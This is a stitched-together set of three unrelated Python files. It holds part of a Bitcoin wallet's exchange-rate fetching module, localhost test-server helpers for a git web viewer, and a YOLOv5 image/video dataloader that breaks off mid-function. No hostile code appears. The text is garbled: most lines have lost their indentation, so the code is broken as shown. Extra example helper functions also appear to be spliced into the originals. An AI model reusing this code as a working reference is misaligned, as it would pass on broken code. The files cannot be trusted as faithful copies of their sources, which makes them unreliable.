return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
class TheRockTrading(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.therocktrading.com',
'/v1/funds/BTCEUR/ticker')
return {'EUR': Decimal(json['last'])}
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
        json = self.get_json('www.unocoin.com', '/trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
class Zaif(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.zaif.jp', '/api/1/last_price/btc_jpy')
return {'JPY': Decimal(json['last_price'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
make_dir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
        '''Return the exchange rate as a Decimal, or NaN if no rate is available'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
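# Hedged sketch (not part of the original module): the minimal surface a new
# rate source needs -- subclass ExchangeBase and return a {ccy: Decimal}
# mapping from get_rates(). The host and path below are placeholders, not a
# real API; the class is defined inside a function so the module-level
# exchange discovery above (get_exchanges_and_currencies) is unaffected.
def _example_exchange_subclass():
    class ExampleExchange(ExchangeBase):
        def get_rates(self, ccy):
            json = self.get_json('ticker.example.invalid', '/api/last')
            return {'USD': Decimal(json['last'])}
    return ExampleExchange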
|
utils.py
|
import os
import time
import contextlib
import werkzeug.serving
import threading
import klaus
TEST_SITE_NAME = "Some site"
HTDIGEST_FILE = "tests/credentials.htdigest"
TEST_REPO = os.path.abspath("tests/repos/build/test_repo")
TEST_REPO_URL = "test_repo/"
UNAUTH_TEST_SERVER = "http://invalid:password@localhost:9876/"
UNAUTH_TEST_REPO_URL = UNAUTH_TEST_SERVER + TEST_REPO_URL
AUTH_TEST_SERVER = "http://testuser:testpassword@localhost:9876/"
AUTH_TEST_REPO_URL = AUTH_TEST_SERVER + TEST_REPO_URL
TEST_REPO_NO_NEWLINE = os.path.abspath("tests/repos/build/no-newline-at-end-of-file")
TEST_REPO_NO_NEWLINE_URL = UNAUTH_TEST_SERVER + "no-newline-at-end-of-file/"
TEST_REPO_DONT_RENDER = os.path.abspath("tests/repos/build/dont-render")
TEST_REPO_DONT_RENDER_URL = UNAUTH_TEST_SERVER + "dont-render/"
ALL_TEST_REPOS = [TEST_REPO, TEST_REPO_NO_NEWLINE, TEST_REPO_DONT_RENDER]
@contextlib.contextmanager
def serve(*args, **kwargs):
app = klaus.make_app(ALL_TEST_REPOS, TEST_SITE_NAME, *args, **kwargs)
server = werkzeug.serving.make_server("localhost", 9876, app)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
try:
yield
finally:
server.server_close()
if 'TRAVIS' in os.environ:
# This fixes some "Address already in use" cases on Travis.
time.sleep(1)
def serve_require_auth(*args, **kwargs):
kwargs['htdigest_file'] = open(HTDIGEST_FILE)
kwargs['require_browser_auth'] = True
    return serve(*args, **kwargs)
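# Hedged usage sketch (not part of the original module): how a test typically
# drives the serve() context manager; the requests library is assumed to be
# available in the test environment.
def _example_serve_usage():
    import requests
    with serve():
        response = requests.get(UNAUTH_TEST_REPO_URL)
        assert response.status_code == 200
    return response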
|
datasets.py
|
# YOLOv5 dataset utils and dataloaders
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from yolov5_master.utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from yolov5_master.utils.general import check_requirements, check_file, check_dataset, xywh2xyxy, xywhn2xyxy, xyxy2xywhn, \
xyn2xy, segments2boxes, clean_str
from yolov5_master.utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
# Image formats
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
# Video formats
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
# Number of CPU threads
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
"""返回路径(文件或目录)列表的单个哈希值"""
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
"""根据图片的信息获取图片的宽、高信息"""
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""如果PIL图像具有EXIF方向标记,则相应地对其进行转置。"""
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
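# Hedged usage sketch (not part of the original module): applying
# exif_transpose() right after opening an image; 'photo.jpg' is an
# illustrative placeholder path.
def _example_exif_transpose():
    im = Image.open('photo.jpg')
    im = exif_transpose(im)  # rotate/flip according to the EXIF Orientation tag
    return im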
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
"""根据LoadImagesAndLabels创建dataloader
参数解析:
:param path:包含图片路径的txt文件或者包含图片的文件夹路径
:param imgsz:网络输入图片大小
:param batch_size: 批次大小
:param stride:网络下采样最大总步长
:param single_cls:是否为单类
:param hyp:网络训练时的一些超参数,包括学习率等,这里主要用到里面一些关于数据增强(旋转、平移等)的系数
:param augment:是否进行数据增强
:param cache:是否提前缓存图片到内存,以便加快训练速度
:param pad:设置矩形训练的shape时进行的填充
:param rect:是否进行矩形训练
:param rank: 多卡训练时的进程编号
:param workers: 加载数据时的cpu进程数
:param image_weights:训练时是否对图片进行采样的权重
:param quad: 是否使用collate_fn4作为dataloader的选择函数
:param prefix: 一个标志,多为train/val,处理标签时保存cache文件会用到
"""
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
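# Hedged usage sketch (not part of the original module): a create_dataloader
# call as train.py-style code might make it; the dataset path is an
# illustrative placeholder and augmentation is left off so no hyp dict is
# required.
def _example_create_dataloader():
    dataloader, dataset = create_dataloader('data/train.txt', imgsz=640,
                                            batch_size=16, stride=32,
                                            augment=False, rect=True,
                                            rank=-1, workers=8, prefix='train: ')
    return dataloader, dataset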
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
"""重载工作的数据加载器,使用与vanilla DataLoader相同的语法"""
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
        # resolve the given path to an absolute path
p = str(Path(path).absolute()) # os-agnostic absolute path
        # if a wildcard pattern is used to select images/videos, get the file paths directly with glob
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
        # if path is a directory, use glob to get all file paths inside it
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
        # if it is a single file, take it directly
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
        # os.path.splitext splits a filename from its suffix (the suffix includes the '.')
        # extract image and video file paths separately
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
        # number of images and videos
ni, nv = len(images), len(videos)
        self.img_size = img_size # input image size
        self.stride = stride # stride, used later in letterbox
        self.files = images + videos # combine image and video paths into one list
        self.nf = ni + nv # total number of files
        self.video_flag = [False] * ni + [True] * nv # bool flags marking which entries are videos, handled separately later
        self.mode = 'image' # initial mode; the code treats mode='image' and mode='video' differently
        # if any videos are present, initialize the OpenCV video capture (cap = cv2.VideoCapture, ...)
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
        # if no files were found, raise an error with a helpful message
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
        # self.count == self.nf means all data has been read
if self.count == self.nf:
raise StopIteration
        # get the file path
path = self.files[self.count]
        # if the current file is a video
if self.video_flag[self.count]:
# Read video
            # switch mode to video
self.mode = 'video'
            # read the current frame; ret_val is a bool that stays True until the video is fully read
ret_val, img0 = self.cap.read()
# if the current video is finished, move on to the next one
if not ret_val:
self.count += 1
# release the video capture object
self.cap.release()
# self.count == self.nf means the last video has been read
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
# number of frames read so far from this video
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize (letterbox: resize and pad the image)
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert BGR to RGB and move the channel axis to the front
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
# make the array contiguous in memory for speed (and to avoid downstream errors)
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
# frame counts the frames read from this video
self.frame = 0
# initialize the video capture object
self.cap = cv2.VideoCapture(path)
# total number of frames in the video file
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
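# Hedged usage sketch (added for illustration, not part of the original source):
# typical inference-side iteration over LoadImages; the source path is an
# illustrative assumption. The 4-tuple per item matches __next__ above.
def _example_load_images(source='data/images', imgsz=640, stride=32):
    dataset = LoadImages(source, img_size=imgsz, stride=stride)
    for path, img, img0, vid_cap in dataset:
        # img: letterboxed CHW RGB array ready for the model;
        # img0: original BGR frame; vid_cap: cv2.VideoCapture or None
        pass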
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
# initialize mode to 'stream' (video streams)
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
# if sources is a file listing multiple stream addresses,
# read each stream address into a list
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
# print current stream index / total streams / stream address
print(f'{i + 1}/{n}: {s}... ', end='')
# if the source is a YouTube URL, check the requirements and import pafy
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
# if source is '0' open the local webcam, otherwise open the stream address
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
# get the stream's frame width and height
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# get the stream's frame rate
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
# get the total frame count
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
# read the first frame
_, self.imgs[i] = cap.read() # guarantee first frame
# start a daemon thread per stream to keep reading frames (daemon: exits with the main thread)
self.threads[i] = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
print('') # newline
# check for common shapes
# compute the shapes after resize+pad;
# by default (auto=True) letterbox pads for rectangular inference
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
self.imgs[i] = im if success else self.imgs[i] * 0
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
# resize and pad each frame
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
# stack the frames into a single batch
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
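# Hedged example (added for illustration, not part of the original source):
# img2label_paths swaps the last '/images/' path component for '/labels/' and the
# image extension for '.txt'. The path below is an illustrative assumption.
def _example_img2label_paths():
    imgs = ['../datasets/coco128/images/train2017/000000000009.jpg']
    # on a POSIX system this returns
    # ['../datasets/coco128/labels/train2017/000000000009.txt']
    return img2label_paths(imgs)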
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size # input image resolution
self.augment = augment # data augmentation
self.hyp = hyp # hyperparameters
self.image_weights = image_weights # weighted image sampling
self.rect = False if image_weights else rect # rectangular training
# load 4 images at a time into a mosaic (only during training)
self.mosaic = self.augment and not self.rect # mosaic augmentation
self.mosaic_border = [-img_size // 2, -img_size // 2] # mosaic augmentation border
self.stride = stride # total downsampling stride of the model
self.path = path # dataset path
self.albumentations = Albumentations() if augment else None # albumentations augmentation
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
# each entry of path is either a txt file listing image paths or a directory of images
# use pathlib.Path for OS-agnostic paths, since the path separator differs between systems
p = Path(p) # os-agnostic
# if the path is a directory of images
if p.is_dir(): # dir
# recursively collect every file under p
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
# if the path is a txt file listing image paths
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
# parent directory of the txt file; os.sep is the OS-specific path separator
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
# replace '/' with os.sep and keep only entries whose extension is a supported image format
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
# derive the label file paths from the image paths
self.label_files = img2label_paths(self.img_files) # labels
# path of the label cache file
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
# if a cache file exists, load it directly
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == 0.4 and cache['hash'] == get_hash(self.label_files + self.img_files)
except:
# otherwise call cache_labels to build the label cache
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
# numbers of found, missing, empty and corrupted labels, plus the total image count
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
# if the cache already existed, just display its results
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
# drop the bookkeeping keys from the cache dict
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
# refresh the label file paths from the cached image keys
self.label_files = img2label_paths(cache.keys()) # update
# for single-class training, force every class id to 0
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
# indices that sort the images by ascending aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
# reorder the image/label paths, shapes and aspect ratios by those indices
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
# initialize batch shapes; nb is the number of batches per epoch
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
# if the largest h/w in a batch is below 1, the batch shape becomes (img_size*maxi, img_size)
if maxi < 1:
shapes[i] = [maxi, 1]
# if the smallest h/w in a batch is above 1, the batch shape becomes (img_size, img_size/mini)
elif mini > 1:
shapes[i] = [1, 1 / mini]
# note the extra pad term; standalone test/val calls pass pad=0.5
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
# pre-allocate per-image slots used when caching images
self.imgs, self.img_npy = [None] * n, [None] * n
# optionally cache images (to RAM or disk) ahead of time to speed up training
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
"""加载label信息生成cache文件"""
# Cache dataset labels, check images and read shapes
x = {} # dict
# counts of missing, found, empty and corrupt labels
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
# verify_image_label is run in parallel over a process pool
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap_unordered(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
